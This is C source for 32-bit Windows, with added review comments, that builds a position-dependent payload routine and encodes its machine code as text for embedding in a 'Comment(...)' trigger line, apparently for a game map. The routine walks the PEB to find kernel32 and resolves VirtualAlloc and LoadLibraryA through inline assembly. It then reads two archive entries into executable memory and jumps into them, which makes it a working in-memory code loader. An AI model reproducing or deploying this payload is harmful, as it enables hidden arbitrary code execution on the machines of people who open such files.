// Build-host headers: C stdio for writing the output file, plus the Win32 and
// multimedia (MIDI) declarations that the prototypes further down rely on.
#include <stdio.h>
#include <windows.h>
#include "mmsystem.h"

// Shorthand for pointer-to-int; not referenced by the code visible on this page.
#define PINT int *
// MSVC register-based calling convention, applied to Comment() and GetResString.
#define FASTCALL __fastcall
// Byte-pack every struct declared after this point (no padding between members).
#pragma pack(1)
 
  
// ActionParams is a POINTER type: it names "pointer to this anonymous struct",
// and Comment() receives one such pointer as its only argument.
// With the #pragma pack(1) in effect above, the members are laid out back to
// back with no padding: six DWORDs followed by one USHORT (26 bytes).
// NOTE(review): the member meanings are not documented on this page; the
// trailing //1 and //2 markers are the author's and are left unexplained.
typedef struct
{
    DWORD Unused0;
    DWORD Text;//1
    DWORD Code;//2
    DWORD Unused2;//
    DWORD Address;
    DWORD Value;
    USHORT Operator;
} *ActionParams;
 
  
// Re-declares HANDLE as an untyped pointer (windows.h already supplies this type).
typedef void *HANDLE;

// ---------------------------------------------------------------------------
// Table of hard-coded entry points.
//
// Every initializer below is an absolute virtual address cast to a
// function-pointer type.  The table is therefore only meaningful inside a
// process whose modules are mapped at exactly these addresses.
// NOTE(review): nothing validates the addresses.  A different build of any of
// the modules involved, or address-space layout randomization (ASLR), leaves
// these pointers aimed at unrelated memory.
//
// Two declaration shapes are used:
//   * WINAPI**  - the constant is the address of a SLOT that holds the function
//                 pointer, so callers dereference once before calling, e.g.
//                 (*sc_SFileOpenArchive)(...).  Presumably these are
//                 import-table slots of the host executable - TODO confirm.
//   * WINAPI* / plain (*) - the constant is used directly as the code address.
// ---------------------------------------------------------------------------

// Loader and memory-protection entry points, reached through pointer slots.
// The inline assembly in Comment() calls through slot 0x4ED160 directly.
// NOTE(review): sc_VirtualProtect's slot lies in a different address range
// from the other slots; which module it belongs to cannot be told from this page.
const FARPROC (WINAPI**sc_GetProcAddress) ( HMODULE hModule, LPCSTR lpProcName ) = (const FARPROC(WINAPI**)(HMODULE,LPCSTR))0x4ED160;
char* (FASTCALL*GetResString)(USHORT index) = (char*(FASTCALL*)(USHORT))0x448880;
DWORD (WINAPI**sc_LoadLibrary)(LPCSTR) = (DWORD(WINAPI**)(LPCSTR))(0x4ED15C);
void (WINAPI**sc_FreeLibrary)(DWORD) = (void(WINAPI**)(DWORD))(0x4ED138);
BOOL (WINAPI**sc_VirtualProtect)(DWORD, DWORD, DWORD, DWORD *) = (BOOL(WINAPI**)(DWORD, DWORD, DWORD, DWORD *))0x5D171358;
//void * (WINAPI**sc_VirtualAlloc)(void *, SIZE_T, DWORD, DWORD) = (void *(WINAPI**)(void *, SIZE_T, DWORD, DWORD))0x004ED127;

// C-runtime style file and heap routines at direct code addresses.  The
// addresses inside /* */ are alternates left by the author.
// NOTE(review): presumably these point into a C runtime DLL - confirm.
// None of them is referenced by the code visible on this page.
FILE *(*sc_fopen)(LPCSTR,LPCSTR)=(FILE *(*)(LPCSTR,LPCSTR))(0x77C0F010/*0x7C02AE09*/);
int(*sc_fwrite)(void*,DWORD,DWORD,FILE*)=(int(*)(void*,DWORD,DWORD,FILE*))(0x77C1173B/*0x7C02CF72*/);
int(*sc_fclose)(FILE*)=(int(*)(FILE*))(0x77C10AB1/*0x7C01441F*/);
void *(*sc_malloc)(DWORD)=(void *(*)(DWORD))(0x77BFC407);
void (*sc_free)(void *)=(void (*)(void *))(0x77BFC21B);

// SFile* archive API, reached through pointer slots: open an archive, open a
// file inside it (optionally relative to an archive handle), query its size,
// read it, and close the handles.  Comment() uses OpenArchive, OpenFileEx,
// GetFileSize, ReadFile, CloseFile and CloseArchive.
BOOL(WINAPI**sc_SFileOpenArchive)(char *archivename, DWORD dwPriority, DWORD dwFlags, HANDLE *handle)=(BOOL(WINAPI**)(char *archivename, DWORD dwPriority, DWORD dwFlags, HANDLE *handle))0x4ED2BC;
BOOL(WINAPI**sc_SFileOpenFile)(char *filename, HANDLE *handle) = (BOOL(WINAPI**)(char *filename, HANDLE *handle))0x4ED364;
BOOL(WINAPI**sc_SFileCloseFile)(HANDLE hFile) = (BOOL(WINAPI**)(HANDLE hFile))0x4ED360;
BOOL(WINAPI**sc_SFileCloseArchive)(HANDLE hArchive) = (BOOL(WINAPI**)(HANDLE hArchive))0x4ED2C0;
long(WINAPI**sc_SFileGetFileSize)(HANDLE hFile, LPDWORD lpFileSizeHigh) = (long(WINAPI**)(HANDLE hFile, LPDWORD lpFileSizeHigh))0x4ED358;
BOOL(WINAPI**sc_SFileOpenFileEx)(HANDLE handle, char *filename, char mode, HANDLE *result) =(BOOL(WINAPI**)(HANDLE handle, char *filename, char mode, HANDLE *result))0x4ED368;
BOOL(WINAPI**sc_SFileReadFile)(HANDLE hFile, void *buffer, DWORD nNumberOfBytesToRead, DWORD*, DWORD) = (BOOL(WINAPI**)(HANDLE hFile, void *buffer, DWORD nNumberOfBytesToRead, DWORD*, DWORD))0x4ED354;

// MIDI output routines at direct code addresses (single indirection).
// None of them is referenced by the code visible on this page.
MMRESULT(WINAPI*sc_midiStreamOpen)(LPHMIDISTRM phms, LPUINT puDeviceID, DWORD cMidi, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen) = (MMRESULT(WINAPI*)(LPHMIDISTRM phms, LPUINT puDeviceID, DWORD cMidi, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen))0x76B29F78;
MMRESULT(WINAPI*sc_midiStreamClose)(HMIDISTRM hms)=(MMRESULT(WINAPI*)(HMIDISTRM hms))0x76B2A2AB;
MMRESULT(WINAPI*sc_midiOutPrepareHeader)(HMIDIOUT hmo, LPMIDIHDR pmh, UINT cbmh)=(MMRESULT(WINAPI*)(HMIDIOUT hmo, LPMIDIHDR pmh, UINT cbmh))0x76B28DC5;
MMRESULT(WINAPI*sc_midiStreamOut)(HMIDISTRM hms, LPMIDIHDR pmh, UINT cbmh)=(MMRESULT(WINAPI*)(HMIDISTRM hms, LPMIDIHDR pmh, UINT cbmh))0x76B2A4EE;
MMRESULT(WINAPI*sc_midiOutOpen)(LPHMIDIOUT phmo,UINT uDeviceID,DWORD_PTR dwCallback,DWORD_PTR dwInstance, DWORD fdwOpen)=(MMRESULT(WINAPI*)(LPHMIDIOUT phmo,UINT uDeviceID,DWORD_PTR dwCallback,DWORD_PTR dwInstance, DWORD fdwOpen))0x76B28B74;
MMRESULT(WINAPI*sc_midiOutGetID)(HMIDIOUT hmo, LPUINT puDeviceID)=(MMRESULT(WINAPI*)(HMIDIOUT hmo, LPUINT puDeviceID))0x76B29CBB;
 
  
// Comment - routine whose compiled bytes Base64Enc() copies out of this
// program.  Nothing on this page calls it directly.
//
// What the body does, in order:
//   1. Opens the archive whose name is the string at fixed address 0x509364,
//      then two entries inside it.  The entry names are the raw bytes of the
//      locals MEM and WB, read as C strings ("MEM" and "wb" on little-endian x86).
//   2. Resolves VirtualAlloc, GetProcAddress, LoadLibraryA and IsBadReadPtr by
//      name through the GetProcAddress slot at 0x4ED160.
//   3. Allocates two PAGE_EXECUTE_READWRITE regions sized from the two entries,
//      reads each entry into its region, and closes the file and archive handles.
//   4. Calls the first region as a function, passing it the second region and
//      the four resolved addresses.
//
// params: not referenced anywhere in the body.
// Returns false when the archive or either entry cannot be opened, true on
// every other path; the results of the allocation and read calls are not
// inspected.
//
// Review notes (defensive reading):
//   * The bytes read from the archive are executed as-is.  Nothing here
//     verifies their origin or integrity, so whoever supplies the archive
//     decides what code runs in the process.
//   * Both buffers are requested writable AND executable.  Private RWX memory
//     that is subsequently called into is a pattern worth alerting on.
//   * Every address literal ties the routine to one exact set of module builds
//     and load addresses.
BOOL FASTCALL Comment(ActionParams params)
{

    // Entry point of the first archive entry once it has been read into memory.
    HMODULE (*MemLoadLibrary)(void *, DWORD, DWORD, DWORD, DWORD);
    HANDLE mpq,file1,file2;
    void *dll;
    DWORD siz1,siz2;
    // Entry names packed into integers: 5064013 == 0x004D454D, stored as the
    // bytes 4D 45 4D 00 ("MEM"); 25207 == 0x00006277, stored as 77 62 00 00 ("wb").
    DWORD MEM = 5064013;
    DWORD WB = 25207;

    if(!(*sc_SFileOpenArchive)((char*)0x509364, 0, 0, &mpq)) return false;
    if(!(*sc_SFileOpenFileEx)(mpq, (char*)&MEM, 0, &file1)) return false;
    if(!(*sc_SFileOpenFileEx)(mpq, (char*)&WB, 0, &file2)) return false;
    // Second argument 0: the high 32 bits of the size are not requested.
    siz1=(*sc_SFileGetFileSize)(file1, 0);
    siz2=(*sc_SFileGetFileSize)(file2, 0);

    // Locals filled in by the inline assembly below.  This sc_VirtualAlloc is a
    // local; the file-scope declaration of the same name is commented out.
    void * (WINAPI*sc_VirtualAlloc)(DWORD, DWORD, DWORD, DWORD);
    DWORD GetProcAddress1;
    DWORD LoadLibraryA1;
    DWORD IsBadReadPtr1;

    _asm{
        // Lookup 1 of 4: "VirtualAlloc".
        // CALL jumps over the inline string and, as a side effect, pushes the
        // address of that string (its return address); this value ends up as
        // the lpProcName argument of the call below.
        call $+5+13;// 13 is the number of _EMIT directives below, i.e. the string length including the \0
        _EMIT 'V';// the API function name is written here.
        _EMIT 'i'
        _EMIT 'r'
        _EMIT 't'
        _EMIT 'u'
        _EMIT 'a'
        _EMIT 'l'
        _EMIT 'A'
        _EMIT 'l'
        _EMIT 'l'
        _EMIT 'o'
        _EMIT 'c'
        _EMIT '\0';// the terminating NUL is required.
        // fs:[30h] is the 32-bit PEB pointer, +0Ch is PEB.Ldr and +1Ch is the
        // head of the initialization-order module list.  LODSD follows the
        // first entry forward link to the second entry, and [eax+8] is read as
        // that module base address, pushed as the hModule argument.
        // NOTE(review): presumably this selects kernel32.dll on the Windows
        // version the author used; the list order is not a documented contract.
        mov eax,fs:30h;
        mov eax,[eax+0Ch];
        mov esi,[eax+1Ch];
        lodsd;
        push [eax+8];
        call DS:[0x4ED160];// sc_GetProcAddress; a character constant cannot be written here, otherwise compilation fails.
        mov sc_VirtualAlloc,eax;

        // Lookup 2 of 4: "GetProcAddress" (same sequence as lookup 1).
        call $+5+15;// 15 is the number of _EMIT directives below, i.e. the string length including the \0
        _EMIT 'G';// the API function name is written here.
        _EMIT 'e'
        _EMIT 't'
        _EMIT 'P'
        _EMIT 'r'
        _EMIT 'o'
        _EMIT 'c'
        _EMIT 'A'
        _EMIT 'd'
        _EMIT 'd'
        _EMIT 'r'
        _EMIT 'e'
        _EMIT 's'
        _EMIT 's'
        _EMIT '\0';// the terminating NUL is required.
        mov eax,fs:30h;
        mov eax,[eax+0Ch];
        mov esi,[eax+1Ch];
        lodsd;
        push [eax+8];
        call DS:[0x4ED160];// sc_GetProcAddress; a character constant cannot be written here, otherwise compilation fails.
        mov GetProcAddress1,eax;

        // Lookup 3 of 4: "LoadLibraryA" (same sequence as lookup 1).
        call $+5+13;// 13 is the number of _EMIT directives below, i.e. the string length including the \0
        _EMIT 'L';// the API function name is written here.
        _EMIT 'o'
        _EMIT 'a'
        _EMIT 'd'
        _EMIT 'L'
        _EMIT 'i'
        _EMIT 'b'
        _EMIT 'r'
        _EMIT 'a'
        _EMIT 'r'
        _EMIT 'y'
        _EMIT 'A'
        _EMIT '\0';// the terminating NUL is required.
        mov eax,fs:30h;
        mov eax,[eax+0Ch];
        mov esi,[eax+1Ch];
        lodsd;
        push [eax+8];
        call DS:[0x4ED160];// sc_GetProcAddress; a character constant cannot be written here, otherwise compilation fails.
        mov LoadLibraryA1,eax;

        // Lookup 4 of 4: "IsBadReadPtr" (same sequence as lookup 1).
        call $+5+13;// 13 is the number of _EMIT directives below, i.e. the string length including the \0
        _EMIT 'I';// the API function name is written here.
        _EMIT 's'
        _EMIT 'B'
        _EMIT 'a'
        _EMIT 'd'
        _EMIT 'R'
        _EMIT 'e'
        _EMIT 'a'
        _EMIT 'd'
        _EMIT 'P'
        _EMIT 't'
        _EMIT 'r'
        _EMIT '\0';// the terminating NUL is required.
        mov eax,fs:30h;
        mov eax,[eax+0Ch];
        mov esi,[eax+1Ch];
        lodsd;
        push [eax+8];
        call DS:[0x4ED160];// sc_GetProcAddress; a character constant cannot be written here, otherwise compilation fails.
        mov IsBadReadPtr1,eax;
    }
    // The reference cast stores the allocation address in the function-pointer
    // variable.  Both regions are committed as PAGE_EXECUTE_READWRITE.
    (void*&)MemLoadLibrary = (HMODULE)sc_VirtualAlloc(NULL, siz1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    dll = sc_VirtualAlloc(NULL, siz2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    // siz1 / siz2 double as the "bytes read" out-parameters and are overwritten.
    (*sc_SFileReadFile)(file1, (void*&)MemLoadLibrary, siz1, &siz1, 0);
    (*sc_SFileReadFile)(file2, dll, siz2, &siz2, 0);
    (*sc_SFileCloseFile)(file1);
    (*sc_SFileCloseFile)(file2);
    (*sc_SFileCloseArchive)(mpq);
    // Transfers control to the bytes read from the first archive entry.
    MemLoadLibrary(dll,(DWORD)sc_VirtualAlloc,GetProcAddress1,LoadLibraryA1,IsBadReadPtr1);
    return true;
}
 
  
 
 
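// End marker: Base64Enc() uses the address of this empty function as the upper
// bound of the machine code of Comment().
// NOTE(review): this assumes the toolchain emits AfterFunction immediately
// after Comment and that both names resolve to the function bodies themselves;
// the language guarantees neither.
void AfterFunction(){}

// Base64Enc - encode the first `size` bytes of Comment() as printable text.
//
// size: number of bytes to encode; a value <= 0 (the default) means "from the
//       start of Comment up to the start of AfterFunction".
// Returns a NUL-terminated buffer allocated with new BYTE[]; the caller owns
// it and releases it with delete[].
//
// Despite the name this is not RFC 4648 Base64: every 3 input bytes become
// four 6-bit values, and each value is simply offset by 0x30.  The output
// therefore uses only the contiguous ASCII range 0x30..0x6F ('0' through 'o')
// and carries no '=' padding.
//
// The buffer is sized as 4 characters per 3-byte group (rounded up) plus the
// terminator.  The earlier (size - 1) * 4 / 3 + 1 was smaller than what the
// loop writes, so the final characters and the terminator landed past the end
// of the allocation.  A trailing group of 1 or 2 bytes is zero-filled instead
// of reading beyond `size`.
LPCSTR Base64Enc(int size = 0)
{
    if (size <= 0)
        size = PtrToLong((PBYTE)AfterFunction - (PBYTE)Comment);

    // A non-positive span means the two functions are not laid out as assumed;
    // produce an empty string rather than sizing a buffer from a negative count.
    if (size < 0)
        size = 0;

    PBYTE text = (PBYTE)Comment;
    const int groups = size / 3 + (size % 3 != 0 ? 1 : 0);
    PBYTE out = new BYTE[(size_t)groups * 4 + 1];
    PBYTE buf = out;

    for (int left = size; left > 0; left -= 3, text += 3)
    {
        const BYTE b0 = text[0];
        const BYTE b1 = (left > 1) ? text[1] : 0;
        const BYTE b2 = (left > 2) ? text[2] : 0;

        *buf++ = (BYTE)(((b0 >> 2) & 0x3F) + 0x30);
        *buf++ = (BYTE)((((b0 & 3) << 4) | (b1 >> 4)) + 0x30);
        *buf++ = (BYTE)((((b1 & 0xF) << 2) | (b2 >> 6)) + 0x30);
        *buf++ = (BYTE)((b2 & 0x3F) + 0x30);
    }

    *buf = 0;
    return (LPCSTR)out;
}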
 
  
 
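// Writes a single line of the form
//     Comment("<encoded bytes>", 0, 0, 17, 0, 1);
// to d:\desktop\comment.txt, where <encoded bytes> is the result of
// Base64Enc() applied to the compiled body of Comment().
//
// Returns 0 on success and 1 when the output file cannot be opened, written
// or closed.
int main(int argc, CHAR* argv[])
{
    (void)argc;
    (void)argv;

    // NOTE(review): the result of this allocation is never used; its purpose
    // is not evident from this page, so the call is kept unchanged.
    malloc(1);

    FILE *f1 = fopen("d:\\desktop\\comment.txt", "wb");
    if (f1 == NULL)
        return 1;   // passing a NULL stream to fprintf is undefined behaviour

    LPCSTR encoded = Base64Enc();
    int rc = 0;
    if (fprintf(f1, "Comment(\"%s\", 0, 0, 17, 0, 1);\n", encoded) < 0)
        rc = 1;

    // Base64Enc() allocates its result with new BYTE[]; release it the same way.
    delete[] (PBYTE)encoded;

    // fclose flushes the stream, so a failure here means the line was not stored.
    if (fclose(f1) != 0)
        rc = 1;
    return rc;
}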
 